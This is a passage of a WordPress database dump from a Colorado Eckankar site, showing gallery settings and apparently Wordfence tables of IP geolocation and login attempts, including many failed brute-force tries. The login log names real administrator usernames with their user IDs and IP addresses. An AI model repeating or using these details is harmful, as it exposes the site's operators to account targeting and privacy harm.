,(269328,104,0),(269329,116,0),(269329,117,0),(269329,110,0),(269329,111,0),(269329,112,0),(269329,113,0),(269329,114,0),(269329,164,0),(269329,202,0),(269340,192,0),(269330,112,0),(269330,113,0),(269340,187,0),(269330,185,0),(269339,104,0),(269330,202,0),(269338,104,0),(269341,187,0),(269341,192,0),(269340,111,0),(269340,110,0),(269387,115,0),(269387,116,0),(269387,117,0),(269387,110,0),(269387,111,0),(269387,112,0),(269387,113,0),(269387,114,0),(269387,118,0),(269387,197,0),(269388,160,0),(269392,111,0),(269392,110,0),(269392,112,0),(269392,113,0),(269392,115,0),(269392,114,0),(269392,117,0),(269392,116,0),(269392,192,0),(269392,118,0),(269395,205,0),(269402,126,0),(269403,34,0),(269404,34,0),(269405,34,0),(269412,112,0),(269412,113,0),(269412,115,0),(269412,114,0),(269412,117,0),(269412,116,0),(269415,129,0),(269415,191,0),(269416,122,0),(269416,111,0),(269416,110,0),(269416,112,0),(269416,113,0),(269416,115,0),(269416,114,0),(269416,190,0);
/*!40000 ALTER TABLE `wpcl_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_term_relationships` with 3687 row(s)
--

--
-- Table structure for table `wpcl_actionscheduler_claims`
--

DROP TABLE IF EXISTS `wpcl_actionscheduler_claims`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_actionscheduler_claims` (
  `claim_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`claim_id`),
  KEY `date_created_gmt` (`date_created_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=724647 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_actionscheduler_claims`
--

LOCK TABLES `wpcl_actionscheduler_claims` WRITE;
/*!40000 ALTER TABLE `wpcl_actionscheduler_claims` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_actionscheduler_claims` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_actionscheduler_claims` with 0 row(s)
--

--
-- Table structure for table `wpcl_wflocs`
--

DROP TABLE IF EXISTS `wpcl_wflocs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wflocs` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `ctime` int(10) unsigned NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `city` varchar(255) DEFAULT '',
  `region` varchar(255) DEFAULT '',
  `countryName` varchar(255) DEFAULT '',
  `countryCode` char(2) DEFAULT '',
  `lat` float(10,7) DEFAULT 0.0000000,
  `lon` float(10,7) DEFAULT 0.0000000,
  PRIMARY KEY (`IP`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wflocs`
--

LOCK TABLES `wpcl_wflocs` WRITE;
/*!40000 ALTER TABLE `wpcl_wflocs` DISABLE KEYS */;
INSERT INTO `wpcl_wflocs` VALUES (0x00000000000000000000FFFFB860DB37,1700584093,0,'Denver','Colorado','United States','US',39.7350998,-105.0269012),(0x00000000000000000000FFFF4C8278C6,1700511651,0,'Denver','Colorado','United States','US',39.7066994,-104.9693985);
/*!40000 ALTER TABLE `wpcl_wflocs` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wflocs` with 2 row(s)
--

--
-- Table structure for table `wpcl_gg_settings_sets`
--

DROP TABLE IF EXISTS `wpcl_gg_settings_sets`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_gg_settings_sets` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `data` text NOT NULL,
  `gallery_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_gg_settings_sets`
--

LOCK TABLES `wpcl_gg_settings_sets` WRITE;
/*!40000 ALTER TABLE `wpcl_gg_settings_sets` DISABLE KEYS */;
INSERT INTO `wpcl_gg_settings_sets` VALUES (1,'a:19:{s:5:\"title\";s:19:\"Colorado ECK Temple\";s:12:\"previewImage\";s:0:\"\";s:4:\"sort\";a:2:{s:6:\"sortto\";s:0:\"\";s:6:\"sortby\";s:0:\"\";}s:7:\"plugins\";a:1:{s:10:\"membership\";a:1:{s:6:\"enable\";s:0:\"\";}}s:4:\"area\";a:10:{s:4:\"grid\";s:1:\"0\";s:8:\"position\";s:1:\"1\";s:8:\"distance\";s:1:\"5\";s:5:\"width\";s:3:\"100\";s:10:\"width_unit\";s:1:\"1\";s:7:\"padding\";s:1:\"0\";s:11:\"photo_width\";s:3:\"215\";s:16:\"photo_width_unit\";s:1:\"0\";s:12:\"photo_height\";s:3:\"215\";s:17:\"photo_height_unit\";s:1:\"0\";}s:7:\"general\";a:2:{s:7:\"columns\";a:1:{s:6:\"number\";s:1:\"3\";}s:17:\"responsiveColumns\";a:3:{s:7:\"desktop\";a:2:{s:5:\"width\";s:4:\"1200\";s:7:\"columns\";s:1:\"3\";}s:6:\"tablet\";a:2:{s:5:\"width\";s:3:\"768\";s:7:\"columns\";s:1:\"3\";}s:6:\"mobile\";a:2:{s:5:\"width\";s:3:\"320\";s:7:\"columns\";s:1:\"3\";}}}s:9:\"thumbnail\";a:7:{s:6:\"border\";a:5:{s:6:\"radius\";s:1:\"0\";s:11:\"radius_unit\";s:1:\"0\";s:4:\"type\";s:4:\"none\";s:5:\"color\";s:7:\"#fefefe\";s:5:\"width\";s:2:\"10\";}s:11:\"cropQuality\";s:3:\"100\";s:6:\"shadow\";a:5:{s:7:\"overlay\";s:1:\"0\";s:5:\"color\";s:7:\"#000000\";s:4:\"blur\";s:1:\"5\";s:1:\"x\";s:1:\"2\";s:1:\"y\";s:1:\"4\";}s:7:\"overlay\";a:14:{s:6:\"effect\";s:16:\"quarter-slide-up\";s:7:\"enabled\";s:4:\"true\";s:8:\"personal\";s:5:\"false\";s:17:\"polaroidAnimation\";s:4:\"true\";s:18:\"polaroidScattering\";s:4:\"true\";s:18:\"polaroidFrameWidth\";s:2:\"20\";s:10:\"background\";s:7:\"#6f0000\";s:10:\"foreground\";s:7:\"#ffffff\";s:12:\"transparency\";s:1:\"5\";s:9:\"text_size\";s:2:\"14\";s:14:\"text_size_unit\";s:1:\"0\";s:10:\"text_align\";s:4:\"left\";s:8:\"position\";s:3:\"top\";s:11:\"font_family\";s:7:\"Default\";}s:7:\"tooltip\";s:5:\"false\";s:8:\"isMobile\";s:5:\"false\";s:22:\"isDisableMobileCaption\";s:5:\"false\";}s:17:\"disableImageTitle\";s:1:\"1\";s:13:\"socialSharing\";a:1:{s:7:\"enabled\";s:0:\"\";}s:16:\"horizontalScroll\";a:6:{s:7:\"enabled\";s:5:\"false\";s:5:\"color\";s:0:\"\";s:12:\"transparency\";s:2:\"60\";s:14:\"mouseWheelStep\";s:2:\"20\";s:9:\"touchStep\";s:3:\"200\";s:14:\"responsiveMode\";s:1:\"0\";}s:11:\"border-type\";s:7:\"Example\";s:10:\"use_shadow\";s:1:\"0\";s:12:\"mouse_shadow\";s:1:\"0\";s:3:\"box\";a:12:{s:7:\"enabled\";s:4:\"true\";s:4:\"type\";s:1:\"1\";s:5:\"theme\";s:7:\"theme_6\";s:9:\"imageText\";s:16:\"data-description\";s:10:\"background\";s:0:\"\";s:12:\"transparency\";s:2:\"30\";s:9:\"slideshow\";s:5:\"false\";s:14:\"slideshowSpeed\";s:4:\"2500\";s:14:\"popupHoverStop\";s:4:\"true\";s:13:\"slideshowAuto\";s:5:\"false\";s:10:\"popupwidth\";s:0:\"\";s:11:\"popupheight\";s:0:\"\";}s:5:\"popup\";a:2:{s:6:\"border\";a:3:{s:4:\"type\";s:5:\"solid\";s:5:\"color\";s:7:\"#ffffff\";s:5:\"width\";s:0:\"\";}s:13:\"placementType\";s:1:\"0\";}s:8:\"lazyload\";a:5:{s:7:\"enabled\";s:1:\"1\";s:15:\"animationEffect\";s:4:\"show\";s:14:\"effectDuration\";s:3:\"400\";s:13:\"defaultImgUrl\";s:118:\"https://eckankar-colorado.org/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Galleries/assets/img/loading.gif\";s:10:\"leerImgUrl\";s:115:\"https://eckankar-colorado.org/wp-content/plugins/gallery-by-supsystic/src/GridGallery/Galleries/assets/img/leer.png\";}s:7:\"preload\";a:2:{s:7:\"enabled\";s:4:\"true\";s:10:\"background\";s:7:\"#0073AA\";}s:9:\"adminPage\";a:1:{s:18:\"slimScrollStartPos\";s:1:\"0\";}s:5:\"icons\";a:12:{s:6:\"effect\";s:17:\"hi-icon-effect-5d\";s:7:\"enabled\";s:5:\"false\";s:5:\"color\";s:7:\"#ffffff\";s:11:\"hover_color\";s:7:\"#ffffff\";s:10:\"background\";s:7:\"#1e73be\";s:16:\"background_hover\";s:7:\"#1e73be\";s:4:\"size\";s:2:\"16\";s:6:\"margin\";s:1:\"5\";s:15:\"overlay_enabled\";s:4:\"true\";s:13:\"overlay_color\";s:7:\"#3498db\";s:20:\"overlay_transparency\";s:1:\"5\";s:12:\"showFewIcons\";s:7:\"default\";}}',1),(2,'a:26:{s:5:\"title\";s:11:\"new_preset1\";s:12:\"previewImage\";s:0:\"\";s:4:\"sort\";a:2:{s:6:\"sortto\";s:0:\"\";s:6:\"sortby\";s:0:\"\";}s:7:\"plugins\";a:1:{s:10:\"membership\";a:1:{s:6:\"enable\";s:0:\"\";}}s:4:\"area\";a:10:{s:4:\"grid\";s:1:\"0\";s:8:\"position\";s:1:\"1\";s:8:\"distance\";s:1:\"5\";s:5:\"width\";s:3:\"100\";s:10:\"width_unit\";s:1:\"1\";s:7:\"padding\";s:1:\"0\";s:11:\"photo_width\";s:3:\"215\";s:16:\"photo_width_unit\";s:1:\"0\";s:12:\"photo_height\";s:3:\"215\";s:17:\"photo_height_unit\";s:1:\"0\";}s:7:\"general\";a:2:{s:7:\"columns\";a:1:{s:6:\"number\";s:1:\"3\";}s:17:\"responsiveColumns\";a:3:{s:7:\"desktop\";a:2:{s:5:\"width\";s:4:\"1200\";s:7:\"columns\";s:1:\"3\";}s:6:\"tablet\";a:2:{s:5:\"width\";s:3:\"768\";s:7:\"columns\";s:1:\"3\";}s:6:\"mobile\";a:2:{s:5:\"width\";s:3:\"320\";s:7:\"columns\";s:1:\"3\";}}}s:9:\"thumbnail\";a:7:{s:6:\"border\";a:5:{s:6:\"radius\";s:1:\"0\";s:11:\"radius_unit\";s:1:\"0\";s:4:\"type\";s:4:\"none\";s:5:\"color\";s:7:\"#fefefe\";s:5:\"width\";s:2:\"10\";}s:11:\"cropQuality\";s:3:\"100\";s:6:\"shadow\";a:5:{s:7:\"overlay\";s:1:\"0\";s:5:\"color\";s:7:\"#000000\";s:4:\"blur\";s:1:\"5\";s:1:\"x\";s:1:\"2\";s:1:\"y\";s:1:\"4\";}s:7:\"overlay\";a:16:{s:10:\"text_align\";s:1:\"2\";s:8:\"position\";s:0:\"\";s:7:\"enabled\";s:4:\"true\";s:10:\"background\";s:7:\"#6f0000\";s:12:\"transparency\";s:1:\"5\";s:6:\"effect\";s:16:\"quarter-slide-up\";s:18:\"imageOnHoverEnable\";s:1:\"0\";s:12:\"imageOnHover\";s:0:\"\";s:8:\"personal\";s:5:\"false\";s:17:\"polaroidAnimation\";s:4:\"true\";s:18:\"polaroidScattering\";s:4:\"true\";s:18:\"polaroidFrameWidth\";s:2:\"20\";s:11:\"font_family\";s:7:\"Default\";s:9:\"text_size\";s:2:\"14\";s:14:\"text_size_unit\";s:1:\"0\";s:10:\"foreground\";s:7:\"#ffffff\";}s:7:\"tooltip\";s:5:\"false\";s:8:\"isMobile\";s:5:\"false\";s:22:\"isDisableMobileCaption\";s:5:\"false\";}s:13:\"socialSharing\";a:1:{s:7:\"enabled\";s:0:\"\";}s:8:\"showMore\";a:6:{s:7:\"enabled\";s:5:\"false\";s:12:\"loadOnScroll\";s:5:\"false\";s:10:\"buttonText\";s:9:\"Load More\";s:11:\"loadingText\";s:10:\"Loading...\";s:12:\"imagesAmount\";s:2:\"20\";s:14:\"showMoreAmount\";s:2:\"10\";}s:16:\"horizontalScroll\";a:3:{s:7:\"enabled\";s:5:\"false\";s:5:\"color\";s:0:\"\";s:12:\"transparency\";s:2:\"60\";}s:11:\"border-type\";s:7:\"Example\";s:10:\"use_shadow\";s:1:\"0\";s:12:\"mouse_shadow\";s:1:\"0\";s:3:\"box\";a:13:{s:7:\"enabled\";s:4:\"true\";s:4:\"type\";s:1:\"1\";s:5:\"theme\";s:7:\"theme_6\";s:9:\"imageText\";s:16:\"data-description\";s:15:\"linkedImageText\";s:10:\"data-title\";s:10:\"background\";s:0:\"\";s:12:\"transparency\";s:2:\"30\";s:9:\"slideshow\";s:5:\"false\";s:14:\"slideshowSpeed\";s:4:\"2500\";s:14:\"popupHoverStop\";s:4:\"true\";s:13:\"slideshowAuto\";s:5:\"false\";s:10:\"popupwidth\";s:0:\"\";s:11:\"popupheight\";s:0:\"\";}s:5:\"popup\";a:1:{s:5:\"video\";a:4:{s:5:\"width\";s:3:\"853\";s:6:\"height\";s:3:\"480\";s:8:\"autoplay\";s:5:\"false\";s:5:\"onEnd\";s:1:\"0\";}}s:7:\"preload\";a:4:{s:7:\"enabled\";s:4:\"true\";s:10:\"background\";s:7:\"#0073AA\";s:9:\"icon_name\";s:7:\"default\";s:10:\"icon_items\";s:1:\"0\";}s:5:\"posts\";a:9:{s:6:\"enable\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:9:\"autoposts\";s:1:\"0\";s:15:\"autopostsNumber\";s:1:\"5\";s:7:\"current\";s:3:\"671\";s:6:\"author\";s:1:\"0\";s:4:\"date\";s:1:\"0\";s:8:\"contents\";s:1:\"0\";s:10:\"categories\";s:1:\"0\";}s:5:\"pages\";a:1:{s:7:\"current\";s:3:\"655\";}s:5:\"icons\";a:12:{s:7:\"enabled\";s:5:\"false\";s:13:\"overlay_color\";s:7:\"#3498db\";s:15:\"overlay_enabled\";s:4:\"true\";s:4:\"size\";s:2:\"16\";s:5:\"color\";s:7:\"#ffffff\";s:11:\"hover_color\";s:7:\"#ffffff\";s:20:\"overlay_transparency\";s:1:\"5\";s:10:\"background\";s:7:\"#1e73be\";s:16:\"background_hover\";s:7:\"#1e73be\";s:14:\"bgTransparency\";s:1:\"0\";s:6:\"margin\";s:1:\"5\";s:6:\"effect\";s:17:\"hi-icon-effect-5d\";}s:14:\"captionBuilder\";a:5:{s:10:\"isOnceUsed\";s:1:\"1\";s:10:\"background\";a:1:{s:6:\"enable\";s:1:\"1\";}s:5:\"title\";a:5:{s:6:\"enable\";s:1:\"1\";s:8:\"position\";s:13:\"center_bottom\";s:8:\"paddings\";a:4:{s:4:\"left\";s:2:\"10\";s:5:\"right\";s:2:\"10\";s:3:\"top\";s:2:\"20\";s:6:\"bottom\";s:1:\"0\";}s:7:\"bgColor\";s:0:\"\";s:19:\"bgColorTransparency\";s:1:\"0\";}s:11:\"description\";a:8:{s:8:\"position\";s:13:\"center_center\";s:8:\"paddings\";a:4:{s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:6:\"bottom\";s:1:\"0\";}s:11:\"font_family\";s:7:\"Default\";s:9:\"font_size\";s:2:\"14\";s:14:\"font_size_unit\";s:1:\"0\";s:9:\"fontColor\";s:0:\"\";s:7:\"bgColor\";s:7:\"#0c0c0c\";s:19:\"bgColorTransparency\";s:1:\"5\";}s:5:\"icons\";a:7:{s:8:\"position\";s:10:\"center_top\";s:8:\"paddings\";a:4:{s:4:\"left\";s:1:\"0\";s:5:\"right\";s:1:\"0\";s:3:\"top\";s:1:\"0\";s:6:\"bottom\";s:1:\"0\";}s:21:\"popupFontAwesomeClass\";s:9:\"fa-expand\";s:21:\"videoFontAwesomeClass\";s:0:\"\";s:20:\"linkFontAwesomeClass\";s:0:\"\";s:7:\"bgColor\";s:0:\"\";s:19:\"bgColorTransparency\";s:1:\"0\";}}s:10:\"categories\";a:15:{s:6:\"preset\";s:1:\"0\";s:7:\"enabled\";s:5:\"false\";s:8:\"position\";s:3:\"top\";s:5:\"align\";s:6:\"center\";s:5:\"order\";a:1:{i:0;s:7:\"__all__\";}s:6:\"nav_bg\";s:7:\"#1e73be\";s:11:\"hide_nav_bg\";s:2:\"on\";s:7:\"text_bg\";s:7:\"#82a0bf\";s:12:\"hide_text_bg\";s:2:\"on\";s:10:\"text_color\";s:7:\"#1e73be\";s:11:\"theme_color\";s:3:\"off\";s:7:\"padding\";a:2:{s:4:\"vert\";s:1:\"3\";s:3:\"hor\";s:2:\"10\";}s:11:\"font_weight\";s:6:\"normal\";s:9:\"font_size\";s:2:\"12\";s:6:\"border\";a:5:{s:5:\"width\";s:1:\"1\";s:5:\"style\";s:5:\"solid\";s:5:\"color\";s:7:\"#1e73be\";s:6:\"radius\";s:1:\"3\";s:11:\"radius_unit\";s:2:\"px\";}}s:9:\"quicksand\";a:2:{s:7:\"enabled\";s:1:\"0\";s:8:\"duration\";s:4:\"1800\";}s:10:\"pagination\";a:10:{s:6:\"preset\";s:1:\"0\";s:7:\"enabled\";s:5:\"false\";s:8:\"per_page\";s:2:\"10\";s:3:\"pos\";s:3:\"top\";s:5:\"align\";s:4:\"left\";s:9:\"container\";a:2:{s:10:\"background\";s:0:\"\";s:15:\"hide_background\";s:2:\"on\";}s:4:\"text\";a:4:{s:10:\"background\";s:0:\"\";s:15:\"hide_background\";s:2:\"on\";s:5:\"color\";s:7:\"#0a0a0a\";s:10:\"hide_color\";s:3:\"off\";}s:7:\"padding\";a:2:{s:8:\"vertical\";s:1:\"4\";s:10:\"horizontal\";s:1:\"8\";}s:4:\"font\";a:2:{s:6:\"weight\";s:6:\"normal\";s:4:\"size\";s:2:\"13\";}s:6:\"border\";a:5:{s:5:\"width\";s:1:\"1\";s:4:\"type\";s:5:\"solid\";s:5:\"color\";s:7:\"#999999\";s:6:\"radius\";s:1:\"4\";s:11:\"radius_unit\";s:2:\"px\";}}s:9:\"watermark\";a:9:{s:7:\"enabled\";s:0:\"\";s:8:\"show_for\";s:1:\"3\";s:11:\"all_img_sel\";s:1:\"1\";s:4:\"type\";s:3:\"img\";s:3:\"url\";s:0:\"\";s:6:\"margin\";s:1:\"0\";s:8:\"position\";s:13:\"center_center\";s:6:\"rotate\";s:1:\"0\";s:12:\"transparency\";s:2:\"50\";}s:7:\"buttons\";a:12:{s:5:\"class\";s:0:\"\";s:5:\"color\";s:7:\"#000000\";s:15:\"backgroundColor\";s:0:\"\";s:10:\"fontFamily\";s:7:\"Default\";s:8:\"fontSize\";s:0:\"\";s:10:\"fontWeight\";s:6:\"normal\";s:8:\"paddingV\";s:1:\"5\";s:8:\"paddingH\";s:1:\"8\";s:11:\"borderStyle\";s:5:\"solid\";s:11:\"borderWidth\";s:1:\"1\";s:11:\"borderColor\";s:7:\"#000000\";s:12:\"borderRadius\";s:1:\"2\";}s:8:\"lazyload\";a:1:{s:7:\"enabled\";s:1:\"1\";}}',2);
/*!40000 ALTER TABLE `wpcl_gg_settings_sets` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_gg_settings_sets` with 2 row(s)
--

--
-- Table structure for table `wpcl_wflogins`
--

DROP TABLE IF EXISTS `wpcl_wflogins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wflogins` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `hitID` int(11) DEFAULT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `fail` tinyint(3) unsigned NOT NULL,
  `action` varchar(40) NOT NULL,
  `username` varchar(255) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `UA` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`IP`,`fail`),
  KEY `hitID` (`hitID`)
) ENGINE=MyISAM AUTO_INCREMENT=20220 DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wflogins`
--

LOCK TABLES `wpcl_wflogins` WRITE;
/*!40000 ALTER TABLE `wpcl_wflogins` DISABLE KEYS */;
INSERT INTO `wpcl_wflogins` VALUES (19589,131154,1699104990.033449,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19590,131155,1699105748.448030,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19591,131156,1699106515.064031,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19592,131156,1699106515.066593,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19593,131157,1699106571.021203,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF423741D2,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(19594,131158,1699107197.986655,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19595,131159,1699107198.830153,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19596,131160,1699107199.734439,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19597,131161,1699107200.586020,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF5B5CF4C7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(19598,131162,1699107289.776486,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19599,131172,1699108060.531649,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19600,131173,1699108320.398185,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFB860D197,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36'),(19007,116035,1693309091.840256,1,'loginFailInvalidUsername','cass',0,0x00000000000000000000FFFF5863694E,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0'),(19008,116036,1693317832.647778,1,'loginFailInvalidUsername','webhero',0,0x00000000000000000000FFFFB9325C85,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'),(19048,116166,1693407804.560135,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(19579,131136,1699098879.812526,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19580,131137,1699099614.165219,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19581,131146,1699100377.617913,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19582,131147,1699101145.141182,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19583,131149,1699101921.915614,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19584,131149,1699101921.918183,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19585,131150,1699102692.169704,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(19586,131151,1699103462.680566,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF34E80608,'Mozilla/5.0'),(18440,109492,1691408332.148683,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF2DC34524,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18441,109493,1691408333.709617,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFB89A0D7A,'Mozilla/5.0 (Linux; Android 11; EA211002) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18442,109494,1691408336.197805,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF71A1FC8E,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G781W) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18443,109495,1691408338.368072,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFF6BAC00D8,'Mozilla/5.0 (Linux; Android 11; SM-A025U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18444,109497,1691416037.173129,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF62AE7DCE,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(18445,109498,1691416076.303848,1,'loginFailInvalidUsername','blackhand',0,0x00000000000000000000FFFF40771E5F,'Mozilla/5.0 (Linux; Android 11; moto g power (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18446,109499,1691416101.033607,1,'loginFailInvalidUsername','chen',0,0x00000000000000000000FFFF294E187E,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15'),(18447,109500,1691416102.510285,1,'loginFailInvalidUsername','admin777',0,0x00000000000000000000FFFF5D4CF19F,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(18448,109501,1691417797.446278,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF5E173131,'Mozilla/5.0 (Linux; Android 11; SM-A326U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18449,109502,1691417810.011255,1,'loginFailInvalidUsername','ncpsite',0,0x00000000000000000000FFFF01B440A2,'Mozilla/5.0 (Linux; Android 12; SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18450,109503,1691417812.259489,1,'loginFailInvalidUsername','lpd-admin',0,0x00000000000000000000FFFF5BF46A1A,'Mozilla/5.0 (Linux; Android 11; SM-A515U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18451,109504,1691417814.304450,1,'loginFailInvalidUsername','shaohao',0,0x00000000000000000000FFFFCC0F6CF0,'Mozilla/5.0 (Linux; Android 11; motorola edge 5G UW (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18452,109505,1691417817.413586,1,'loginFailInvalidUsername','wrathion',0,0x00000000000000000000FFFF8A027598,'Mozilla/5.0 (Linux; Android 11; M2007J20CG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18453,109506,1691417818.946724,1,'loginFailInvalidUsername','admin-lpd',0,0x00000000000000000000FFFFB9713F8D,'Mozilla/5.0 (Linux; Android 10; motorola one 5G ace) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18607,111256,1691941124.951050,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF0EEF18FD,'Mozilla/5.0 (Linux; Android 11; moto g power (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18608,111257,1691941126.631051,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF55C1D251,'Mozilla/5.0 (Linux; Android 9; moto e6 (XT2005DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18609,111258,1691941129.447809,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFF45A3D86F,'Mozilla/5.0 (Linux; Android 8.1.0) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile DuckDuckGo/5 